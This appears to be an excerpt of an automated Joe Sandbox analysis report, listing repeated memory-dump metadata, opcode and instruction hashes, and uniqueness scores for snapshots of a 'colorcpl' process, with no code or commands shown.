                                                                                                    • Instruction ID: cea94f240d8d22a9207f5c61aa7f6b7902b8a7add44b167956054de82770327b
                                                                                                    • Opcode Fuzzy Hash: a174de0e20a84e4e462ad37a34075d61457da5c0f2ce69c74170702235a7cc26
                                                                                                    • Instruction Fuzzy Hash: 8DF05937A221B25BE3309B4AE980986B738F7DD752BE00F7BE18197150F7605481CF98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3e4de2a8b15d4e0d56af53cdbb9d7e24bab17acf61d511c0d7f7dd5f5a89532f
                                                                                                    • Instruction ID: 2c2216692ee902bf63e81cb7d62ce6791c08c678ce243656e859dcd766b6df61
                                                                                                    • Opcode Fuzzy Hash: 3e4de2a8b15d4e0d56af53cdbb9d7e24bab17acf61d511c0d7f7dd5f5a89532f
                                                                                                    • Instruction Fuzzy Hash: 20F09632A1AB50DBD3318E16C840917B7F5FFD2AA0B860B699C99537D0D760B805C7D1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 61a05f2e583a7f8459c8a446ac862a951a5c744327d893a3cbcb345d9d0b580d
                                                                                                    • Instruction ID: 20d66fad260dfd9ef45781d69ec59f2bbf36691d52cf9c551bb289eeb3d8059d
                                                                                                    • Opcode Fuzzy Hash: 61a05f2e583a7f8459c8a446ac862a951a5c744327d893a3cbcb345d9d0b580d
                                                                                                    • Instruction Fuzzy Hash: B1F0BEB2611169BFCB08CF89CC80D9F7BACEB057A0B50436AB506DB251D630EE00CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1c1e0596cc6db6671efa1ae131eba045ee99a3925ee5525dd3afa0d482156a32
                                                                                                    • Instruction ID: a9442d2881cafd387467d6262f4937208342f03168d9910f7d04ccc33e7a1435
                                                                                                    • Opcode Fuzzy Hash: 1c1e0596cc6db6671efa1ae131eba045ee99a3925ee5525dd3afa0d482156a32
                                                                                                    • Instruction Fuzzy Hash: B3F0B436241185BBC7129E45DC00F873B2AEBC4BA0F500124F6084B5A0DA31EC11D7E4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1e06ed61310b1d794269c9836913e5a980f308687efe4163e3217f76fdbfaa08
                                                                                                    • Instruction ID: d835eb27943e65b4fa311fc74ac3593211dbcae08c9df48a6f69717c94252c46
                                                                                                    • Opcode Fuzzy Hash: 1e06ed61310b1d794269c9836913e5a980f308687efe4163e3217f76fdbfaa08
                                                                                                    • Instruction Fuzzy Hash: 9BF02770791662DBF7169A78DE01B0633E3BB91740FA44639E045CB5A0EA68DC82C781
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4e4f965a61f215541276479b4b6d7cd71d22ce5b68bb813e93710f84c44fdab7
                                                                                                    • Instruction ID: 1ed2d52578b3134048b5f3cf60a8579d7c523cea0265978c3a0a965a74820bb5
                                                                                                    • Opcode Fuzzy Hash: 4e4f965a61f215541276479b4b6d7cd71d22ce5b68bb813e93710f84c44fdab7
                                                                                                    • Instruction Fuzzy Hash: C2F06D75A11288EBDB04DFA9D945EAEBBF4EF08304F804569E501EB281E674E900CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9b72c1dd50dff90e1c4b718c40104cfda6149b4e8ac6573aaf0814be1314b689
                                                                                                    • Instruction ID: 860da7abb2cff2a84b64e212f6dd2def02e979de33ad0efb3ac2a56093d4b82e
                                                                                                    • Opcode Fuzzy Hash: 9b72c1dd50dff90e1c4b718c40104cfda6149b4e8ac6573aaf0814be1314b689
                                                                                                    • Instruction Fuzzy Hash: 6BF0CD76602340DFD314CF94E540B58B7B0EB45724F60CA7FC0168B690CB32A801CF04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: be8f275fb45caa31bc9cbe4e476abc5161cde76dbe801e8e1b42d620e4b65110
                                                                                                    • Instruction ID: 86fa32ed71e44ef57534a3d76d6f0ee0a48cb4670db730459ef26e91cce6e567
                                                                                                    • Opcode Fuzzy Hash: be8f275fb45caa31bc9cbe4e476abc5161cde76dbe801e8e1b42d620e4b65110
                                                                                                    • Instruction Fuzzy Hash: 4AF0BE39D226E5CFD311C719C988F46BBEAAB86AA0F855A24E64587912C328EC40C650
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 27ec3afdf15dce7045b826a293e6eb366372731b24bacc3529fe095728e4fd66
                                                                                                    • Instruction ID: 10d966506034774bfef4aa0f2e9bf81931fed10605bf447c3d9d06901fc88ef6
                                                                                                    • Opcode Fuzzy Hash: 27ec3afdf15dce7045b826a293e6eb366372731b24bacc3529fe095728e4fd66
                                                                                                    • Instruction Fuzzy Hash: B2F0E2711115838FC716CB19C950F15B766FB823B0F958379E9664B9A1DB24D800CB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 80ca61f3288c51d0b87e7d001a6fc51f0dcca765c533c5073ee7004e3d28116e
                                                                                                    • Instruction ID: 957f76e0db0fdba194623cf1eb9eb6683664d9bcb45f912679797cfbc9c0c895
                                                                                                    • Opcode Fuzzy Hash: 80ca61f3288c51d0b87e7d001a6fc51f0dcca765c533c5073ee7004e3d28116e
                                                                                                    • Instruction Fuzzy Hash: DAF0A775A02288EBDB04DBB9D95AF9E77B8EF08704F900554E502EB2C1DA74ED40C759
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1ea122ef26d0356b5436f4e1e4d142718a0b464fef2285af27d0814637061948
                                                                                                    • Instruction ID: 2a2782fe7398f9c91c1ac3245f4a07cadedf5def93fa28e7ab433c78ef6a1b16
                                                                                                    • Opcode Fuzzy Hash: 1ea122ef26d0356b5436f4e1e4d142718a0b464fef2285af27d0814637061948
                                                                                                    • Instruction Fuzzy Hash: A9F0A771A02288EBDB04DBB9D95AF9E77B8EF09704F901554E501EB2C1DA74ED40C719
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dbc8035a8f8ffac40aebbd0424024af1fcaab450d302894c4225e6153dbd4e46
                                                                                                    • Instruction ID: 16cc541dfd3feee83b04ed1f0da31e44c7e7c9d6aade5ce7b3b82491a57f7281
                                                                                                    • Opcode Fuzzy Hash: dbc8035a8f8ffac40aebbd0424024af1fcaab450d302894c4225e6153dbd4e46
                                                                                                    • Instruction Fuzzy Hash: DAF0A075A0228CEBDB04DBB9C95AF9E77B8EF08304F800599F601EB2C1DA74E940C759
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1626d060ce2a7d3b3697f941c928d20152f223b2e19af32d82154d37a5088328
                                                                                                    • Instruction ID: d42e177bade4aaef73b4713855de8e31c1c9c7625bb677e5c26201692671018a
                                                                                                    • Opcode Fuzzy Hash: 1626d060ce2a7d3b3697f941c928d20152f223b2e19af32d82154d37a5088328
                                                                                                    • Instruction Fuzzy Hash: F1F0E572B01254BFEB30DA898D05F9AB3ACD782B75F110275B501E71C0C6B49E00C394
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 714da2a1c4f1efc1161e20e655b19aedbdd7afa7e59196edeb41504cf78fc0bd
                                                                                                    • Instruction ID: 407d5e2ba198f92f4f7f790e65bdc23672200a2e1e5a88d4a99b1b231b960dc6
                                                                                                    • Opcode Fuzzy Hash: 714da2a1c4f1efc1161e20e655b19aedbdd7afa7e59196edeb41504cf78fc0bd
                                                                                                    • Instruction Fuzzy Hash: 8EE02B32720254AFEB04DB58D940F4A33EDEB8D758F08009CF40AD7140D670DE00D780
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0dd50ceb6795b47ade68664fa709b583edd297e3422a76fe84efd11e6f8db54d
                                                                                                    • Instruction ID: b59faf10eb00ac9f1deaf023757e217468b017ff9f77db25511332bc8e694af3
                                                                                                    • Opcode Fuzzy Hash: 0dd50ceb6795b47ade68664fa709b583edd297e3422a76fe84efd11e6f8db54d
                                                                                                    • Instruction Fuzzy Hash: 06F02774A12288EBDF04DBB9D95AF9E77B8EF08700F800154F101EB2C0DA34E9008718
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 58fbbcf199b8bdd28eabfd575b713fcc364720f4c43178bfe78a3647d3dad58d
                                                                                                    • Instruction ID: fa348a2a8f04fd278a045ccfe33f33d1f769da6f99825ebe7d1c8b7539a4df5e
                                                                                                    • Opcode Fuzzy Hash: 58fbbcf199b8bdd28eabfd575b713fcc364720f4c43178bfe78a3647d3dad58d
                                                                                                    • Instruction Fuzzy Hash: 63E09272A52821ABD3118A599C40F5673AEEBE9660F5A0539E544C7220D628ED01C7E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c302cbae27b5571972a90e8c402ca34e50d6c97a953fa7a80cbfb8759a8e20e1
                                                                                                    • Instruction ID: 572059dbc08ff7c9a5f1b909dfff041de4bf01e0da78c9666e21113eab9fb2b0
                                                                                                    • Opcode Fuzzy Hash: c302cbae27b5571972a90e8c402ca34e50d6c97a953fa7a80cbfb8759a8e20e1
                                                                                                    • Instruction Fuzzy Hash: BFF0ED31A212D5DFD311CB29C584F0277F9EB023B1FA68B69E40A8B615C738EC82C294
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d33d6b9f7fabe44203ebe765e78a878f36cb71f40b61d43e5cf9315c3b59f614
                                                                                                    • Instruction ID: faea1f6890ec6e0124556913923a039b9ca8aa034d36b68eae9ae1590851ac5d
                                                                                                    • Opcode Fuzzy Hash: d33d6b9f7fabe44203ebe765e78a878f36cb71f40b61d43e5cf9315c3b59f614
                                                                                                    • Instruction Fuzzy Hash: 21E06831A103D793C7209A10C880FAAB3AB9F82B04FD08371F4005F650D769BD41CBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9e325588acc6b15edc20011f99a642b4b4c24f3113330be6afd0f5f2d9cd3cee
                                                                                                    • Instruction ID: d8b2a7b17026ff454b71df5f00d131b6b1d0464b9f6a3330404018f67cd56fc7
                                                                                                    • Opcode Fuzzy Hash: 9e325588acc6b15edc20011f99a642b4b4c24f3113330be6afd0f5f2d9cd3cee
                                                                                                    • Instruction Fuzzy Hash: 38F05E72A11396DFE750CF98DA8474877B4F748721F90C63BC1428AA90DB356494CF05
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 95576071c67a317adbe288b1b7625a9bd37d79af1005b6d5a14a95f7d051aeb1
                                                                                                    • Instruction ID: 25e80b2f7c66a2762dfc6edbf904d877b2b3353ca58cd3670fb5235411249ea1
                                                                                                    • Opcode Fuzzy Hash: 95576071c67a317adbe288b1b7625a9bd37d79af1005b6d5a14a95f7d051aeb1
                                                                                                    • Instruction Fuzzy Hash: C6E0DF33A01114BBCB22A6998E05F9A7BADEF94BA0F920564B500E70A0D620EE00CA90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 156e13366ecf80be3081f2b2274d6134dfdc911ce20f9e366b099422a7fcba0b
                                                                                                    • Instruction ID: 8c5dfd88f1d51ef35a677db51caff8623e2063f59f06926be8c8615968ba2e4f
                                                                                                    • Opcode Fuzzy Hash: 156e13366ecf80be3081f2b2274d6134dfdc911ce20f9e366b099422a7fcba0b
                                                                                                    • Instruction Fuzzy Hash: 1DE0C233201890BFEB130AA6CC80E62FB6EFB846B0B240135F52482530CB22AC71F794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1fbc1a57687687429949ef68cda6319bf2983e9682e37ceea575ce143fddd903
                                                                                                    • Instruction ID: da4444fcc6215de027020eb8c33b220f87e2d52bd75dafdfe2143791c6550720
                                                                                                    • Opcode Fuzzy Hash: 1fbc1a57687687429949ef68cda6319bf2983e9682e37ceea575ce143fddd903
                                                                                                    • Instruction Fuzzy Hash: 3DE068362936A0DBC7326F04ED20F4237A2EF45FD0F810A28A6120B9708320BC80C684
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 530c4b8706d5b4739cf7fca0d4ec2140365bb19b351e9e952cee3bb353013ca1
                                                                                                    • Instruction ID: ca5f3b5ab39f7db62961c7fd7c9361094df0d0d09f5c1ca6044a453fb244f855
                                                                                                    • Opcode Fuzzy Hash: 530c4b8706d5b4739cf7fca0d4ec2140365bb19b351e9e952cee3bb353013ca1
                                                                                                    • Instruction Fuzzy Hash: 90C012392A1AC28BCB01CA29C690A8837E0B740640BC60AD0E9808BB11D218E442CA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                                    • Instruction ID: 5f7d069b4d86b6e74e95273a2f0536df7947f4c1a202ba70107af0dab682fae2
                                                                                                    • Opcode Fuzzy Hash: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                                    • Instruction Fuzzy Hash: 32C08C32080288BBC7126A81CC00F027B2AE790B60F500020B6040A9718632ECA0D988
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d5cfd273907e73ea4dac16a05e06ead9d4cff632145b002fd22589196fc6b546
                                                                                                    • Instruction ID: 0b69e21f7f33dcbb41217426496c7d95ad02cdcd9f8dc5a8c87b1ba7603eff97
                                                                                                    • Opcode Fuzzy Hash: d5cfd273907e73ea4dac16a05e06ead9d4cff632145b002fd22589196fc6b546
                                                                                                    • Instruction Fuzzy Hash: 52D01270A1A1C1DEE70ACB6861915013FE8BB0EB00B4648AEE046C7301C6244109C715
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24e2e236a666f9bb1d1a1b83819c978e318f65d854f46dc04eb5f7dcdd2b4c2a
                                                                                                    • Instruction ID: ed49787714cd8c315335b1646a361a50244a45cdd3146083bda90895bd3fc7d8
                                                                                                    • Opcode Fuzzy Hash: 24e2e236a666f9bb1d1a1b83819c978e318f65d854f46dc04eb5f7dcdd2b4c2a
                                                                                                    • Instruction Fuzzy Hash: 6BC08C32080288BBC7126A42CD00F017B29E7A0BA0F500020B6040A5608632E860D588
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                                    • Instruction ID: dd420be002dc9e299c66e67bcc087e41876a5c364a2e3a42ac02354caff28fca
                                                                                                    • Opcode Fuzzy Hash: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                                    • Instruction Fuzzy Hash: 8EC02B343514C09ADB055B30CC40F103355FB00B60FF007547231468F0CA68AC00DA04
                                                                                                    Uniqueness

